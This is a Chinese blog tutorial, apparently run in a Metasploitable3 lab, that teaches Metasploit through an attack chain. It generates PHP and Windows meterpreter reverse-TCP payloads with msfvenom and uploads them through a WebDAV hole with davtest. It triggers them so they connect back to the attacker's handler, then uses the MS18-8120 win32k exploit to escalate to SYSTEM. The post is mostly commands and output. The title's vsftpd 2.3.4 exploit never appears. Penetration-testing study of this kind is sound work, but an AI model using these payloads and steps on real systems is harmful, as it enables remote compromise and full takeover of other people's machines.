metasploit深入学习之ms18_8120&&vsftpd2.3.4

metasploit是一款非常给力的后渗透系统,本次通过复现vsftpd2.3.4的漏洞和ms18_8120的漏洞来学习metasploit

介绍

  首先一点,为什么metaslpoit(下称msf)强大呢,msf本身就有1851个漏洞利用模块,1046个辅助模块,541个漏洞利用模块,44个加密模块(v5.0.1),不仅如此,他还可以调用外部插件,而且本身也是开源的,也可以加载自己写的模块,msf很好但也不是最好的,本次主要是以学习msf为主,当然实验环境下也有更好的入侵方法。
  进入msf的命令是msfconsole,如果提示数据库为开启则可以用/etc/init.d/postgresql start开启metasploit的数据库,如果你需要完成一次渗透测试,如果你手上没有合适的工具的话,msf可以完成所有的工作

一、扫描

  msf调用nmap扫描的命令是大db_nmap,具体用法和nmap使用差不多,也可以使用msf的扫描模块进行扫描,常用的扫描模块有brute_dirs,dir_listing,dir_scanner

二、复现

  目标主机192.168.1.66:8585上存在一个dav2的上传漏洞,攻击思路大概是我们可以先利用这个上传漏洞上传一个payload,实验入侵主机到进一步提权。
首先我们先制作一个payload

root@kali:~# msfvenom -p php/meterpreter_reverse_tcp lhost=192.168.1.70 lport=13579 -f raw > /root/Desktop/13579.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 30656 bytes

-p选择payload,lhost是本地ip,lport为本地监听端口,-f格式,>输出为文件

然后我们需要上传脚本,上传脚本会用到davtest这个工具,davtest支持自动发送文件漏洞,目录自动随机帮助隐藏文件,发送文本文件,并尝试移动到可执行文件的名称,上传的文件自动清理,发送任意文件。

root@kali:~/Desktop# davtest -url http://192.168.1.66:8585/uploads/ -uploadfile 13579.php -uploadloc 13579.php 
********************************************************
 Testing DAV connection
OPEN		SUCCEED:		http://192.168.1.66:8585/uploads
********************************************************
 unless  Uploading file
Upload succeeded: http://192.168.1.66:8585/uploads/13579.php

-url是网址,-uploadfile是要上传的文件,-uploadloc是要上传的位置。准备好了就可以开始打了

root@kali:~# msfconsole -q
[-] ***
[-] * WARNING: No database support: could not connect to server: Connection refused
	Is the server running on host "localhost" (::1) and accepting
	TCP/IP connections on port 5432?
could not connect to server: Connection refused
	Is the server running on host "localhost" (127.0.0.1) and accepting
	TCP/IP connections on port 5432?

[-] ***
[*] Starting persistent handler(s)...
msf5 > use exploit/multi/handler 
msf5 exploit(multi/handler) > set payload php/meterpreter_reverse_tcp 
payload => php/meterpreter_reverse_tcp
msf5 exploit(multi/handler) > set lport 13579
lport => 13579
msf5 exploit(multi/handler) > set lhost 192.168.1.70
lhost => 192.168.1.70
msf5 exploit(multi/handler) > exploit -j -z
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.1.70:13579

启动msf时-q是不显示封面,exploit -j -z-j是把exploit放到jobs里,-z挂后台,jobs的意思是当监听到反弹的shell之后会建立一个session,然后不会不停下来,继续监听。session的可以理解为一个会话。到这里,我们只需要访问一下我们上传的payload就可以反弹shell了(可以用浏览器访问)

curl http://192.168.1.66:8585/uploads/13579.php

getshell

msf5 exploit(multi/handler) > [*] Meterpreter session 1 opened (192.168.1.70:13579 -> 192.168.1.66:49816) at 2019-01-22 02:30:29 -0500
[*] Meterpreter session 2 opened (192.168.1.70:13579 -> 192.168.1.66:49817) at 2019-01-22 02:30:31 -0500

meterpreter > background
msf5 exploit(multi/handler) > sessions 

Active sessions
===============

  Id  Name  Type                     Information                          Connection
  --  ----  ----                     -----------                          ----------
  1         meterpreter php/windows  LOCAL SERVICE (0) @ METASPLOITABLE3  192.168.1.70:13579 -> 192.168.1.66:49816 (192.168.1.66)

background是返回msf控制台,getshell之后得到的shell是local server的权限,我们上传一个另外一个payload上去get更高权限的shell

root@kali:~/Desktop# msfvenom -p windows/meterpreter_reverse_tcp Lhost=192.168.1.70 lport=13789 -f exe > 13789.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 179779 bytes
Final size of exe file: 254976 bytes

上传

root@kali:~/Desktop# davtest -url http://192.168.1.66:8585/uploads/ -uploadfile 13789.exe -uploadloc 13789.exe
********************************************************
 Testing DAV connection
OPEN		SUCCEED:		http://192.168.1.66:8585/uploads
********************************************************
 unless  Uploading file
Upload succeeded: http://192.168.1.66:8585/uploads/13789.exe

msf开启监听,sessions -i 1选择id为1的session,getwd获取当前绝对路径,execute -f执行文件

msf5 exploit(multi/handler) > set payload windows/meterpreter_reverse_tcp 
payload => windows/meterpreter_reverse_tcp
msf5 exploit(multi/handler) > show options 
msf5 exploit(multi/handler) > set lport 13789
lport => 13789
msf5 exploit(multi/handler) > exploit -j -z

msf5 exploit(multi/handler) > sessions -i 1
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.1.70:13789 

msf5 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getwd
C:\wamp\www\uploads
meterpreter > execute -f "C:\\wamp\\www\\uploads\\13789.exe"
Process 1372 created.
meterpreter > [*] Meterpreter session 3 opened (192.168.1.70:13789 -> 192.168.1.66:50670) at 2019-01-22 02:38:39 -0500

我们用上传的第一个payload执行我们的第二次payload,就可以得到普通用户权限

msf5 exploit(multi/handler) > sessions 
Active sessions
===============

  Id  Name  Type                     Information                                   Connection
  --  ----  ----                     -----------                                   ----------
  1         meterpreter php/windows  LOCAL SERVICE (0) @ METASPLOITABLE3           192.168.1.70:13579 -> 192.168.1.66:53138 (192.168.1.66)
  2         meterpreter x86/windows  NT AUTHORITY\LOCAL SERVICE @ METASPLOITABLE3  192.168.1.70:13789 -> 192.168.1.66:54852 (192.168.1.66)

接下来用ms18_8120提权

msf5 exploit(multi/handler) > use exploit/windows/local/ms18_8120_win32k_privesc 
msf5 exploit(windows/local/ms18_8120_win32k_privesc) > set session 3
session => 3

msf5 exploit(windows/local/ms18_8120_win32k_privesc) > exploit 

[*] Started reverse TCP handler on 192.168.1.70:4444 
[*] Sending stage (179779 bytes) to 192.168.1.66
[+] Exploit finished, wait for privileged payload execution to complete.
[*] Meterpreter session 4 opened (192.168.1.70:4444 -> 192.168.1.66:50799) at 2019-01-22 02:42:04 -0500

meterpreter >

查看sessions就可以看到普通用户权限变成了system权限

msf5 exploit(windows/local/ms18_8120_win32k_privesc) > sessions

Active sessions
===============

  Id  Name  Type                     Information                                   Connection
  --  ----  ----                     -----------                                   ----------
  1         meterpreter php/windows  LOCAL SERVICE (0) @ METASPLOITABLE3           192.168.1.70:13579 -> 192.168.1.66:53138 (192.168.1.66)
  2         meterpreter x86/windows  NT AUTHORITY\LOCAL SERVICE @ METASPLOITABLE3  192.168.1.70:13789 -> 192.168.1.66:54852 (192.168.1.66)
  3         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ METASPLOITABLE3         192.168.1.70:4444 -> 192.168.1.66:62289 (192.168.1.66)

到此,复现完毕


本博客所有文章除特别声明外,均采用 CC BY-SA 4.0 协议 ,转载请注明出处!